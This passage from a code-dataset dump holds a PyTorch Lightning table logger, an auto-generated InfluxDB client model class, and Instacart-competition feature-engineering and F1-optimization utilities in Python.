name='TableLogger', version=None):\n super().__init__()\n self.table = pd.DataFrame()\n self.metrics = []\n self.val_metrics = {}\n self.display_handle = DisplayHandle()\n self._version = version\n self._experiment = self.table\n self._name = name\n\n def average_metrics(self):\n avg_metrics = {key: np.mean([m[key] for m in self.metrics])\n for key in self.metrics[0].keys()}\n avg_metrics.update(self.val_metrics)\n self.table = self.table.append(avg_metrics, ignore_index=True)\n self.metrics = []\n\n def display(self):\n if len(self.table) == 1:\n 
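# Illustrative sketch, not part of the dataset record above: the day-9.py
# two_sum scans a Python list, so each `complement in nums` membership test is
# O(n); a set-based variant is O(n) overall and also refuses to pair a value
# with itself unless it occurs twice in the window.
def two_sum(nums, target):
    seen = set()
    for num in nums:
        if target - num in seen:
            return [target - num, num]
        seen.add(num)
    return False

assert two_sum([35, 20, 15, 25, 47], 40) == [15, 25]
assert two_sum([1, 2, 3], 6) is False  # 3 cannot pair with itself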
self.display_handle.display(self.table)\n else:\n self.display_handle.update(self.table)\n\n @rank_zero_only\n def log_hyperparams(self, params):\n # Save hparams into the logger dir\n # Calls logger.save afterwards\n pass\n\n @rank_zero_only\n def log_metrics(self, metrics, step):\n if 'val/loss' in metrics:\n self.val_metrics = metrics\n self.average_metrics()\n self.display()\n else:\n self.metrics.append(metrics)\n\n @rank_zero_only\n def finalize(self, status):\n self.agg_and_log_metrics(None)\n if len(self.metrics) > 0:\n self.average_metrics()\n self.display_handle.update(self.table)\n self.save()\n\n def save(self):\n self.table.to_csv(f'{self.name}/version_{self.version}/logs.csv', index=False)\n\n @property\n def experiment(self):\n return self._experiment\n\n @property\n def name(self):\n return self._name\n\n @property\n def version(self):\n if self._version is None:\n self._version = max(int(re.search(r'\\d+$', str(v)).group()) for v in Path(self.name).iterdir())+1\n return self._version\n","repo_name":"ttumiel/components","sub_path":"components/lightning/table_logger.py","file_name":"table_logger.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29085062098","text":"# coding: utf-8\n\n\"\"\"\nInfluxDB OSS API Service.\n\nThe InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501\n\nOpenAPI spec version: 2.0.0\nGenerated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\n\nclass VariableLinks(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n '_self': 'str',\n 'org': 'str',\n 'labels': 'str'\n }\n\n attribute_map = {\n '_self': 'self',\n 'org': 'org',\n 'labels': 'labels'\n }\n\n def __init__(self, _self=None, org=None, labels=None): # noqa: E501,D401,D403\n \"\"\"VariableLinks - a model defined in OpenAPI.\"\"\" # noqa: E501\n self.__self = None\n self._org = None\n self._labels = None\n self.discriminator = None\n\n if _self is not None:\n self._self = _self\n if org is not None:\n self.org = org\n if labels is not None:\n self.labels = labels\n\n @property\n def _self(self):\n \"\"\"Get the _self of this VariableLinks.\n\n :return: The _self of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self.__self\n\n @_self.setter\n def _self(self, _self):\n \"\"\"Set the _self of this VariableLinks.\n\n :param _self: The _self of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self.__self = _self\n\n @property\n def org(self):\n \"\"\"Get the org of this VariableLinks.\n\n :return: The org of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self._org\n\n @org.setter\n def org(self, org):\n \"\"\"Set the org of this VariableLinks.\n\n :param org: The org of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self._org = org\n\n @property\n def labels(self):\n \"\"\"Get the labels of this VariableLinks.\n\n :return: The labels of this VariableLinks.\n :rtype: str\n \"\"\" # noqa: E501\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n \"\"\"Set 
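# Not part of the dataset record above: table_logger.py as captured calls
# np.mean (in average_metrics), re.search and Path (in the version property)
# without importing them, so those paths raise NameError at runtime; it needs
# these alongside its existing imports:
import re
import numpy as np
from pathlib import Path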
the labels of this VariableLinks.\n\n :param labels: The labels of this VariableLinks.\n :type: str\n \"\"\" # noqa: E501\n self._labels = labels\n\n def to_dict(self):\n \"\"\"Return the model properties as a dict.\"\"\"\n result = {}\n\n for attr, _ in self.openapi_types.items():\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Return the string representation of the model.\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`.\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Return true if both objects are equal.\"\"\"\n if not isinstance(other, VariableLinks):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Return true if both objects are not equal.\"\"\"\n return not self == other\n","repo_name":"influxdata/influxdb-client-python","sub_path":"influxdb_client/domain/variable_links.py","file_name":"variable_links.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","stars":629,"dataset":"github-code","pt":"72"} +{"seq_id":"41058469894","text":"import pandas as pd\nimport numpy as np\nfrom multiprocessing import Pool, cpu_count\nimport os.path\nimport gc\nimport pickle\n\n# Thanks to https://www.kaggle.com/onodera/multilabel-fscore\ndef multilabel_fscore(y_true, y_pred):\n if not isinstance(y_pred, np.ndarray):\n y_pred = np.array([y_pred])\n\n precision = sum([1 for i in y_pred if i in y_true]) / len(y_pred)\n recall = sum([1 for i in y_true if i in y_pred]) / len(y_true)\n denom = (precision + recall)\n if denom == 0:\n denom = 1\n return (2 * precision * recall) / denom\n\n\ndef applyParallel(dfGrouped, func):\n with Pool(cpu_count()) as p:\n ret_list = p.map(func, [group for name, group in dfGrouped])\n return pd.concat(ret_list)\n\n\n\n#####################\n# https://www.kaggle.com/mmueller/f1-score-expectation-maximization-in-o-n/code\n\nimport matplotlib.pylab as plt\nfrom datetime import datetime\nfrom numba import jit\n\nclass F1Optimizer():\n def __init__(self):\n pass\n\n @staticmethod\n @jit\n def get_expectations(P, pNone=None):\n expectations = []\n P = np.sort(P)[::-1]\n\n n = np.array(P).shape[0]\n DP_C = np.zeros((n + 2, n + 1))\n if pNone is None:\n pNone = (1.0 - P).prod()\n\n DP_C[0][0] = 1.0\n for j in range(1, n):\n DP_C[0][j] = (1.0 - P[j - 1]) * DP_C[0, j - 1]\n\n for i in range(1, n + 1):\n DP_C[i, i] = DP_C[i - 1, i - 1] * P[i - 1]\n for j in range(i + 1, n + 1):\n DP_C[i, j] = P[j - 1] * DP_C[i - 1, j - 1] + (1.0 - P[j - 1]) * DP_C[i, j - 1]\n\n DP_S = np.zeros((2 * n + 1,))\n DP_SNone = np.zeros((2 * n + 1,))\n for i in range(1, 2 * n + 1):\n DP_S[i] = 1. / (1. * i)\n DP_SNone[i] = 1. / (1. 
* i + 1)\n for k in range(n + 1)[::-1]:\n f1 = 0\n f1None = 0\n for k1 in range(n + 1):\n f1 += 2 * k1 * DP_C[k1][k] * DP_S[k + k1]\n f1None += 2 * k1 * DP_C[k1][k] * DP_SNone[k + k1]\n for i in range(1, 2 * k - 1):\n DP_S[i] = (1 - P[k - 1]) * DP_S[i] + P[k - 1] * DP_S[i + 1]\n DP_SNone[i] = (1 - P[k - 1]) * DP_SNone[i] + P[k - 1] * DP_SNone[i + 1]\n expectations.append([f1None + 2 * pNone / (2 + k), f1])\n\n return np.array(expectations[::-1]).T\n\n @staticmethod\n @jit\n def maximize_expectation(P, pNone=None):\n expectations = F1Optimizer.get_expectations(P, pNone)\n\n ix_max = np.unravel_index(expectations.argmax(), expectations.shape)\n max_f1 = expectations[ix_max]\n\n predNone = True if ix_max[0] == 0 else False\n best_k = ix_max[1]\n\n return best_k, predNone, max_f1\n\n @staticmethod\n def _F1(tp, fp, fn):\n return 2 * tp / (2 * tp + fp + fn)\n\n @staticmethod\n def _Fbeta(tp, fp, fn, beta=1.0):\n beta_squared = beta ** 2\n return (1.0 + beta_squared) * tp / ((1.0 + beta_squared) * tp + fp + beta_squared * fn)\n\n\ndef print_best_prediction(P, pNone=None):\n print(\"Maximize F1-Expectation\")\n print(\"=\" * 23)\n P = np.sort(P)[::-1]\n n = P.shape[0]\n L = ['L{}'.format(i + 1) for i in range(n)]\n\n if pNone is None:\n print(\"Estimate p(None|x) as (1-p_1)*(1-p_2)*...*(1-p_n)\")\n pNone = (1.0 - P).prod()\n\n PL = ['p({}|x)={}'.format(l, p) for l, p in zip(L, P)]\n print(\"Posteriors: {} (n={})\".format(PL, n))\n print(\"p(None|x)={}\".format(pNone))\n\n opt = F1Optimizer.maximize_expectation(P, pNone)\n best_prediction = ['None'] if opt[1] else []\n best_prediction += (L[:opt[0]])\n f1_max = opt[2]\n\n print(\"Prediction {} yields best E[F1] of {}\\n\".format(best_prediction, f1_max))\n\n\ndef save_plot(P, filename='expected_f1.png'):\n E_F1 = pd.DataFrame(F1Optimizer.get_expectations(P).T, columns=[\"/w None\", \"/wo None\"])\n best_k, _, max_f1 = F1Optimizer.maximize_expectation(P)\n\n plt.style.use('ggplot')\n plt.figure()\n E_F1.plot()\n plt.title('Expected F1-Score for \\n {}'.format(\"P = [{}]\".format(\",\".join(map(str, P)))), fontsize=12)\n plt.xlabel('k')\n plt.xticks(np.arange(0, len(P) + 1, 1.0))\n plt.ylabel('E[F1(P,k)]')\n plt.plot([best_k], [max_f1], 'o', color='#000000', markersize=4)\n plt.annotate('max E[F1(P,k)] = E[F1(P,{})] = {:.5f}'.format(best_k, max_f1), xy=(best_k, max_f1),\n xytext=(best_k, max_f1 * 0.8), arrowprops=dict(facecolor='black', shrink=0.05, width=1, headwidth=7),\n horizontalalignment='center', verticalalignment='top')\n plt.gcf().savefig(filename)\n\n\n\ndef timeit(P):\n s = datetime.now()\n F1Optimizer.maximize_expectation(P)\n e = datetime.now()\n return (e-s).microseconds / 1E6\n\n\ndef benchmark(n=100, filename='runtimes.png'):\n results = pd.DataFrame(index=np.arange(1,n+1))\n results['runtimes'] = 0\n\n for i in range(1,n+1):\n runtimes = []\n for j in range(5):\n runtimes.append(timeit(np.sort(np.random.rand(i))[::-1]))\n results.iloc[i-1] = np.mean(runtimes)\n\n x = results.index\n y = results.runtimes\n results['quadratic fit'] = np.poly1d(np.polyfit(x, y, deg=2))(x)\n\n plt.style.use('ggplot')\n plt.figure()\n results.plot()\n plt.title('Expectation Maximization Runtimes', fontsize=12)\n plt.xlabel('n = |P|')\n plt.ylabel('time in seconds')\n plt.gcf().savefig(filename)\n\n\n#####################\nfrom sklearn.model_selection import ParameterGrid\n#from ggplot import *\nimport time\nimport lightgbm as lgb\nimport pandas as pd\n\n\ndef grid_search(lgb_train, lgb_valid, param_grid, early_stopping_rounds=150):\n \"\"\"\"\n 
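# Illustrative usage sketch, not part of the dataset record above (assumes the
# F1Optimizer class defined in utils.py is in scope): maximize_expectation
# takes posteriors sorted in decreasing order and returns how many top labels
# to keep, whether to also predict "None", and the expected F1 of that choice,
# with p(None|x) defaulting to prod(1 - P) as in print_best_prediction.
import numpy as np

P = np.sort(np.array([0.9, 0.6, 0.3, 0.1]))[::-1]
best_k, pred_none, max_f1 = F1Optimizer.maximize_expectation(P)
print(best_k, pred_none, max_f1)  # keep the top best_k items, optionally + None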
param_grid = {'eta': [0.1], 'max_depth': [4, 6], 'subsample': [0.8, 1]}\n grid_search(lgb_train, lgb_valid, param_grid)\n \"\"\"\n grid = ParameterGrid(param_grid)\n data = pd.DataFrame(list(grid))\n data['time'] = 0\n data['best_score'] = 0\n data['best_iter'] = 0\n\n for i, params in enumerate(grid):\n print(\"Etape \" + str(i + 1))\n start = time.time()\n #ipdb.set_trace()\n model = lgb.train(params, lgb_train, 100000, valid_sets=[lgb_train, lgb_valid],\n early_stopping_rounds=early_stopping_rounds, verbose_eval=50)\n\n end = time.time()\n data.loc[i,'time'] = end - start\n data.loc[i,'best_score'] = model.best_score['valid_1'][params['metric']]\n data.loc[i,'best_iter'] = model.best_iteration\n return data\n\n#########\ndef read_data():\n aisles = pd.read_csv(\"./data/aisles.csv\")\n departments = pd.read_csv(\"./data/departments.csv\")\n order_prior = pd.read_csv(\"./data/order_products__prior.csv\")\n order_train = pd.read_csv(\"./data/order_products__train.csv\")\n orders = pd.read_csv(\"./data/orders.csv\")\n products = pd.read_csv(\"./data/products.csv\")\n\n # orders = orders.groupby(\"user_id\").\\\n # apply(utils.add_fe_to_orders)\n\n # pickle.dump(orders, open(\"orders.p\", \"wb\"))\n orders = pickle.load(open(\"orders.p\", \"rb\"))\n product2vec = pickle.load(open(\"product2vec.p\", \"rb\"))\n #product2vec = pd.read_csv(\"./data/product_embeddings.csv\").drop([\"product_name\", \"aisle_id\", \"department_id\"], axis=1)\n return aisles, departments, order_prior, order_train, orders, products, product2vec\n\n# Fucking slow :/ - So i pickled it\n# Way faster & easier with dplyr...\ndef add_fe_to_orders(group):\n group[\"date\"] = group.iloc[::-1]['days_since_prior_order'].cumsum()[::-1].shift(-1).fillna(0)\n max_group = group[\"order_number\"].max()\n group[\"order_number_reverse\"] = max_group - group[\"order_number\"]\n return group\n\ndef get_products_fe(order_prior):\n products_fe = order_prior. \\\n groupby([\"product_id\"]). \\\n agg({'reordered': {'p_reorder_rt': \"mean\", 'p_count': \"size\"}, \\\n 'add_to_cart_order': {\"p_add_to_cart_order\": \"mean\"}, \\\n 'order_number': {\"P_recency_order\": \"mean\"}, \\\n 'order_number_reverse': {\"P_recency_order_r\": \"mean\"}, \\\n 'date': {\"P_recency_date\": \"mean\"}})\n\n products_fe.columns = products_fe.columns.droplevel(0)\n products_fe = products_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n up_fe2 = order_prior.groupby([\"user_id\", \"product_id\"]).agg(\"size\").rename(\"up_nb_ordered\").reset_index()\n up_fe2[\"bool_reordered\"] = (up_fe2[\"up_nb_ordered\"] > 1).astype(\"int\")\n\n products_fe2 = up_fe2.groupby('product_id')[\"bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"p_reorder_rt_bool\", \"size\": \"p_active_user\"})\n\n products_fe = pd.merge(products_fe, products_fe2, how=\"left\", on=\"product_id\")\n del products_fe2\n\n # Product trend in a way\n products_trend = order_prior.query(\"order_number_reverse < 3\"). \\\n groupby([\"product_id\", \"order_number_reverse\"]).size(). 
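# Illustrative sketch, not part of the dataset record above: the dict-of-dicts
# renaming style used throughout utils.py, e.g.
# agg({'reordered': {'p_reorder_rt': "mean", ...}}), was deprecated and later
# removed in modern pandas; named aggregation (pandas >= 0.25) produces the
# same renamed columns. A sketch covering a few of the columns:
import pandas as pd

def get_products_fe_modern(order_prior):
    return (order_prior
            .groupby("product_id")
            .agg(p_reorder_rt=("reordered", "mean"),
                 p_count=("reordered", "size"),
                 p_add_to_cart_order=("add_to_cart_order", "mean"))
            .reset_index())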
\\\n rename(\"p_size\").reset_index()\n\n products_trend[\"p_trend_rt\"] = products_trend[\"p_size\"] / products_trend[\"p_size\"].shift(-1)\n products_trend[\"p_trend_diff\"] = products_trend[\"p_size\"] - products_trend[\"p_size\"].shift(-1)\n\n cond = products_trend[\"product_id\"] != products_trend[\"product_id\"].shift(-1)\n products_trend.loc[cond, \"p_trend_rt\"] = np.nan\n products_trend.loc[cond, \"p_trend_diff\"] = np.nan\n products_trend = products_trend.query(\"order_number_reverse == 1\").drop(\"order_number_reverse\", 1)\n\n products_fe = pd.merge(products_fe, products_trend, how=\"left\", on=\"product_id\")\n\n del cond, products_trend\n\n product_freq = order_prior.copy()\n product_freq = product_freq.sort_values([\"user_id\", \"product_id\", \"order_number\"])\n\n product_freq[\"p_freq_days\"] = product_freq[\"date\"].shift() - product_freq[\"date\"]\n product_freq[\"p_freq_order\"] = product_freq[\"order_number\"] - product_freq[\"order_number\"].shift()\n product_freq = product_freq.query(\"reordered == 1\")\n\n product_freq = product_freq.groupby(\"product_id\"). \\\n agg({'p_freq_days': {'p_freq_days': \"mean\"}, \\\n 'p_freq_order': {'p_freq_order': \"mean\"}})\n\n product_freq.columns = product_freq.columns.droplevel(0)\n product_freq = product_freq.reset_index()\n\n products_fe = pd.merge(products_fe, product_freq, how=\"left\", on=\"product_id\")\n\n del product_freq\n\n return products_fe\n\n\ndef get_products_fe_mod(order_prior, order_train, nfold=5):\n order_train = order_train.copy()\n order_train[\"user_fold\"] = order_train[\"user_id\"].mod(nfold)\n\n products_fe_mod=[]\n for fold in range(nfold):\n #print(\"Folder: \" + str(fold))\n order_train_tmp = order_train.query(\"user_fold != @fold\").drop(\"user_fold\", axis=1)\n order_train_tmp = pd.concat([order_prior, order_train_tmp])\n products_fe_tmp = get_products_fe(order_train_tmp)\n products_fe_tmp[\"user_fold\"] = fold\n products_fe_mod.append(products_fe_tmp)\n\n products_fe_mod = pd.concat(products_fe_mod)\n\n return products_fe_mod\n\n\ndef get_users_fe(orders, order_prior):\n users_fe = order_prior. \\\n groupby(\"user_id\"). \\\n agg({'reordered': {'U_rt_reordered': 'mean'}})\n\n users_fe.columns = users_fe.columns.droplevel(0)\n users_fe = users_fe.reset_index()\n\n # User basket sum, mean, std\n # TODO same but only on reordered products?\n users_fe2 = order_prior. \\\n groupby([\"user_id\", \"order_id\"]).size(). \\\n reset_index(). \\\n drop(\"order_id\", axis=1). \\\n groupby(\"user_id\"). \\\n agg([np.sum, np.mean, np.std])\n\n users_fe2.columns = [\"U_basket_sum\", \"U_basket_mean\", \"U_basket_std\"]\n users_fe2 = users_fe2.reset_index()\n\n users_fe = pd.merge(users_fe, users_fe2, on=\"user_id\")\n del users_fe2\n\n # u_active_p == user distinct products\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n up_fe2 = order_prior.groupby([\"user_id\", \"product_id\"]).agg(\"size\").rename(\"up_nb_ordered\").reset_index()\n up_fe2[\"bool_reordered\"] = (up_fe2[\"up_nb_ordered\"] > 1).astype(\"int\")\n\n users_fe4 = up_fe2.groupby('user_id')[\"bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"u_reorder_rt_bool\", \"size\": \"u_active_p\"})\n\n users_fe = pd.merge(users_fe, users_fe4, on=\"user_id\")\n del users_fe4\n\n users_fe5 = orders.query(\"order_number_reverse != 0\"). \\\n groupby(\"user_id\"). 
\\\n agg({'date': {'U_date_inscription': 'max'}, \\\n 'days_since_prior_order': {'U_days_since_mean': 'mean', \\\n 'U_days_since_std': 'std'}})\n\n users_fe5.columns = users_fe5.columns.droplevel(0)\n users_fe5 = users_fe5.reset_index()\n\n users_fe = pd.merge(users_fe, users_fe5, on=\"user_id\")\n del users_fe5\n\n # TODO U_none_reordered_strike\n # New way\n # TODO test if it's help or not, keeping it might be used as a skrinking term\n # .query(\"order_number !=1\")\n user_fe_none = order_prior. \\\n groupby([\"order_id\", \"user_id\"]). \\\n agg({'reordered': {'reordered': \"sum\"}, \\\n 'order_number_reverse': {'order_number_reverse': 'first'}})\n\n user_fe_none.columns = user_fe_none.columns.droplevel(0)\n user_fe_none = user_fe_none.reset_index()\n\n user_fe_none[\"reordered\"] = (user_fe_none[\"reordered\"] < 1).astype(int)\n user_fe_none[\"U_none_reordered_strike\"] = user_fe_none[\"reordered\"] * 1 / 2 ** (\n user_fe_none[\"order_number_reverse\"])\n\n user_fe_none = user_fe_none. \\\n groupby(\"user_id\"). \\\n agg({'reordered': {'U_none_reordered_mean': \"mean\"}, \\\n 'U_none_reordered_strike': {'U_none_reordered_strike': \"sum\"}})\n\n user_fe_none.columns = user_fe_none.columns.droplevel(0)\n user_fe_none = user_fe_none.reset_index()\n\n users_fe = pd.merge(users_fe, user_fe_none, on=\"user_id\")\n del user_fe_none\n return users_fe\n\n\ndef get_users_products(order_prior):\n # Could be something else than 1/2\n order_prior[\"UP_date_strike\"] = 1 / 2 ** (order_prior[\"date\"] / 7)\n # order_prior[\"UP_order_strike\"] = 100000 * 1/2 ** (order_prior[\"order_number_reverse\"])\n order_prior[\"UP_order_strike\"] = 1 / 2 ** (order_prior[\"order_number_reverse\"])\n\n users_products = order_prior. \\\n groupby([\"user_id\", \"product_id\"]). \\\n agg({'reordered': {'up_nb_reordered': \"size\"}, \\\n 'add_to_cart_order': {'up_add_to_cart_order_mean': \"mean\"}, \\\n 'add_to_cart_order_relative': {'up_add_to_cart_order_relative_mean': \"mean\"}, \\\n 'add_to_cart_order_inverted': {'up_add_to_cart_order_inverted_mean': \"mean\"}, \\\n 'order_number_reverse': {'up_last_order_number': \"min\", 'up_first_order_number': \"max\"}, \\\n 'date': {'up_last_order_date': \"min\", 'up_first_date_number': \"max\"}, \\\n 'UP_date_strike': {\"UP_date_strike\": \"sum\"}, \\\n 'UP_order_strike': {\"UP_order_strike\": \"sum\"}})\n\n users_products.columns = users_products.columns.droplevel(0)\n users_products = users_products.reset_index()\n return users_products\n\n\ndef get_users_products_none(users_products):\n users_products_none = users_products.groupby(\"user_id\"). \\\n agg({'UP_date_strike': {'O_date_strike_max': \"max\", 'O_date_strike_sum': \"sum\", 'O_date_strike_mean': \"mean\"}, \\\n 'UP_order_strike': {'O_order_strike_max': \"max\", 'O_order_strike_sum': \"sum\",\n 'O_date_order_mean': \"mean\"}})\n\n users_products_none.columns = users_products_none.columns.droplevel(0)\n users_products_none = users_products_none.reset_index()\n return users_products_none\n\n\ndef get_aisles_fe(order_prior, products, aisles):\n aisles_order = pd.merge(order_prior, products, on=\"product_id\")\n aisles_order = pd.merge(aisles_order, aisles, on=\"aisle_id\")\n\n aisles_fe = aisles_order. \\\n groupby([\"aisle_id\"]). 
\\\n agg({'reordered': {'a_reorder_rt': \"mean\", 'a_count': \"size\"}, \\\n 'add_to_cart_order': {\"a_add_to_cart_order\": \"mean\"}})\n\n aisles_fe.columns = aisles_fe.columns.droplevel(0)\n aisles_fe = aisles_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n aisles_fe2 = aisles_order.groupby([\"user_id\", \"aisle_id\"]).agg(\"size\").rename(\"UA_nb_ordered\").reset_index()\n aisles_fe2[\"UA_bool_reordered\"] = (aisles_fe2[\"UA_nb_ordered\"] > 1).astype(\"int\")\n\n aisles_fe2 = aisles_fe2.groupby('aisle_id')[\"UA_bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"a_reorder_rt_bool\", \"size\": \"a_active_user\"})\n\n aisles_fe = pd.merge(aisles_fe, aisles_fe2, how=\"left\", on=\"aisle_id\")\n del aisles_fe2\n return aisles_fe\n\n\ndef get_user_aisle_fe(order_prior, products, aisles, users_fe):\n aisles_order = pd.merge(order_prior, products, on=\"product_id\")\n aisles_order = pd.merge(aisles_order, aisles, on=\"aisle_id\")\n user_aisle_fe = aisles_order. \\\n groupby([\"user_id\", \"aisle_id\"]). \\\n agg({'product_id': {\"UA_product_rt\": \"nunique\"}})\n\n user_aisle_fe.columns = user_aisle_fe.columns.droplevel(0)\n user_aisle_fe = user_aisle_fe.reset_index()\n\n user_aisle_fe = pd.merge(user_aisle_fe, users_fe[[\"user_id\", \"u_active_p\"]], how=\"left\", on=\"user_id\")\n user_aisle_fe[\"UA_product_rt\"] = user_aisle_fe[\"UA_product_rt\"] / user_aisle_fe[\"u_active_p\"]\n user_aisle_fe = user_aisle_fe.drop(\"u_active_p\", axis=1)\n return user_aisle_fe\n\n\ndef get_departments_fe(order_prior, products, aisles, departments):\n departments_order = pd.merge(order_prior, products, on=\"product_id\")\n departments_order = pd.merge(departments_order, aisles, on=\"aisle_id\")\n departments_order = pd.merge(departments_order, departments, on=\"department_id\")\n\n departments_fe = departments_order. \\\n groupby([\"department_id\"]). \\\n agg({'reordered': {'d_reorder_rt': \"mean\", 'd_count': \"size\"}, \\\n 'add_to_cart_order': {\"d_add_to_cart_order\": \"mean\"}})\n\n departments_fe.columns = departments_fe.columns.droplevel(0)\n departments_fe = departments_fe.reset_index()\n\n # bool_reordered = if a product is bought once, prob to be reordered at least once\n departments_fe2 = departments_order.groupby([\"user_id\", \"department_id\"]).agg(\"size\").rename(\n \"UD_nb_ordered\").reset_index()\n departments_fe2[\"UD_bool_reordered\"] = (departments_fe2[\"UD_nb_ordered\"] > 1).astype(\"int\")\n\n departments_fe2 = departments_fe2.groupby('department_id')[\"UD_bool_reordered\"]. \\\n agg([\"mean\", \"size\"]).reset_index(). \\\n rename(index=str, columns={\"mean\": \"d_reorder_rt_bool\", \"size\": \"d_active_user\"})\n\n departments_fe = pd.merge(departments_fe, departments_fe2, how=\"left\", on=\"department_id\")\n del departments_fe2\n return departments_fe\n\n\ndef get_user_department_fe(order_prior, products, aisles, departments, users_fe):\n departments_order = pd.merge(order_prior, products, on=\"product_id\")\n departments_order = pd.merge(departments_order, aisles, on=\"aisle_id\")\n departments_order = pd.merge(departments_order, departments, on=\"department_id\")\n\n user_department_fe = departments_order. \\\n groupby([\"user_id\", \"department_id\"]). 
\\\n agg({'product_id': {\"UD_product_rt\": \"nunique\"}})\n\n user_department_fe.columns = user_department_fe.columns.droplevel(0)\n user_department_fe = user_department_fe.reset_index()\n\n user_department_fe = pd.merge(user_department_fe, users_fe[[\"user_id\", \"u_active_p\"]], how=\"left\", on=\"user_id\")\n user_department_fe[\"UD_product_rt\"] = user_department_fe[\"UD_product_rt\"] / user_department_fe[\"u_active_p\"]\n user_department_fe = user_department_fe.drop(\"u_active_p\", axis=1)\n return user_department_fe\n\n\ndef get_user_past_product(order_prior, orders, order_train):\n user_past_product = order_prior[[\"user_id\", \"product_id\"]].drop_duplicates()\n\n reordered_train = pd.merge(orders, order_train, on=[\"order_id\", \"user_id\"])\n reordered_train = reordered_train.query(\"reordered == 1\")\n\n user_past_product = pd.merge(user_past_product, reordered_train[[\"user_id\", \"product_id\", \"reordered\"]],\n on=[\"user_id\", \"product_id\"], how=\"left\")\n\n user_past_product[\"reordered\"] = user_past_product[\"reordered\"].fillna(0)\n return user_past_product\n\n\ndef get_order_none(order_train):\n order_none = order_train. \\\n groupby([\"order_id\", \"user_id\"])[\"reordered\"].sum(). \\\n reset_index()\n\n order_none[\"reordered\"] = (order_none[\"reordered\"] < 1).astype(int)\n return order_none\n\n\ndef get_df(df, user_past_product, users_fe, products_fe_mod, products, aisles,\n aisles_fe, departments, departments_fe, users_products, product2vec, user_aisle_fe,\n user_department_fe, nfold=5):\n df_set = pd.merge(df, user_past_product, on=[\"user_id\"])\n df_set = pd.merge(df_set, users_fe, on=\"user_id\")\n\n df_set[\"user_fold\"] = df_set[\"user_id\"].mod(nfold)\n df_set = pd.merge(df_set, products_fe_mod, how='left', on=[\"product_id\",\"user_fold\"])\n #df_set = pd.merge(df_set, products_fe, how='left', on=\"product_id\")\n\n df_set = pd.merge(df_set, products, how='left', on=\"product_id\")\n df_set = pd.merge(df_set, aisles, how='left', on=\"aisle_id\")\n df_set = pd.merge(df_set, aisles_fe, how='left', on=\"aisle_id\")\n df_set = pd.merge(df_set, departments, how='left', on=\"department_id\")\n df_set = pd.merge(df_set, departments_fe, how='left', on=\"department_id\")\n df_set = pd.merge(df_set, users_products, how='left', on=[\"user_id\", \"product_id\"])\n df_set = pd.merge(df_set, product2vec, how='left', on=\"product_id\")\n df_set = pd.merge(df_set, user_aisle_fe, how='left', on=[\"user_id\", \"aisle_id\"])\n df_set = pd.merge(df_set, user_department_fe, how='left', on=[\"user_id\", \"department_id\"])\n\n # Should be done in appropriate place\n df_set[\"UP_rt_reordered\"] = df_set[\"up_nb_reordered\"] / df_set[\"order_number\"] # Maybe delete because it might overfit?\n df_set[\"UP_rt_reordered_since_first\"] = df_set[\"up_nb_reordered\"] / df_set[\"up_first_order_number\"]\n df_set[\"UP_days_no-reordered\"] = df_set[\"up_last_order_date\"] - df_set[\"date\"]\n df_set[\"UP_freq_nb_no-reordered\"] = df_set[\"up_last_order_number\"] / df_set[\"p_freq_order\"]\n df_set[\"UP_freq_days_no-reordered\"] = df_set[\"UP_days_no-reordered\"] / df_set[\"p_freq_days\"]\n df_set[\"UP_sum_basket_rt\"] = df_set[\"up_nb_reordered\"] / df_set[\"U_basket_sum\"]\n df_set[\"O_days_since_prior_order_diff\"] = df_set[\"days_since_prior_order\"] - df_set[\"U_days_since_mean\"]\n df_set[\"O_days_since_prior_order_rt\"] = df_set[\"days_since_prior_order\"] / df_set[\"U_days_since_mean\"]\n\n df_set = df_set.drop(\"user_fold\", 1)\n return df_set\n\n\ndef get_mult_none(df, 
